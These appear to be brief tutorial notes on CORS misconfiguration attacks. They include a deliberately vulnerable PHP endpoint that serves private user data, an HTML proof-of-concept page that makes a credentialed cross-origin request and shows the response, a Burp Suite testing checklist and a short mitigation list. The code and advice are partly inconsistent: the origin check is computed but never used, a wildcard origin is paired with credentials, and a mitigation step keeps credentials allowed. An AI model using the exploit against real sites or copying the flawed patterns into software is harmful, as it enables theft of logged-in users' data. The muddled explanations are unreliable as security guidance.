CORS Attack
ow HTTP Headers
Access-Control-Allow: * or <origin> or null
Access-Control-Credentials:
if Access Access-Control-Credentials: true
is Vulnerable CORS
<?php
session_start();
if($_SESSION['islogin'] != 1){
header("Location: login.php");
die();
}
#vulnerablity here
$origin = "mydomain.com";
if ( strpos(@$_SERVER['HTTP_ORIGIN'], "mydomain.com") ){
$origin = @$_SERVER['HTTP_ORIGIN'];
}
header("Content-Type: application/json");
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Credentials: true");
echo '{"name":"Guest user", "phone number":"0234235","email":"email@gmail.com","adddress":"street 3","own books":["Book one","Book two","Book three"],"private books":["book 4","book 5"]}';
POS (if data json use Content-Type = application/json)
<!DOCTYPE html>
<html>
<head>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
url = "<url>";
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
// Display the response in an alert
alert(this.responseText);
// Or display the response in the demo div
document.getElementById("demo").innerHTML = this.responseText;
}
};
xhttp.open("GET", url, true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</head>
<body>
<center>
<h2>CORS PoC Exploit</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
</center>
</body>
</html>
I will try to find this vuln Uing Burpsuit Come with me!

in this request allow credentials if
Testing For CORS Vulnerabilities
remove/add a domain or like attckerlocalhost
Map the application • Test the application for dynamic generation • Does it reflect the user-supplied ACAO header? • Does it only validate on the start/end of a specific string? • Does it allow the null origin? * or yourdoamin,com • Does it restrict the protocol? HTTP or https | 80,8080 or any think • Does it allow credentials?

Click exploit B000000000M!

Mitigation
1. restrict Allowed Origins
Access-control-Allow-Origin: https://example.com
2. Limit HTTP Methods
Access-control-Allow-Methods: GET, POST
3. Control Allowed Header
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Credentials: true
Validate Input and Origin
Content security Policy (CSP)
Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com
Last updated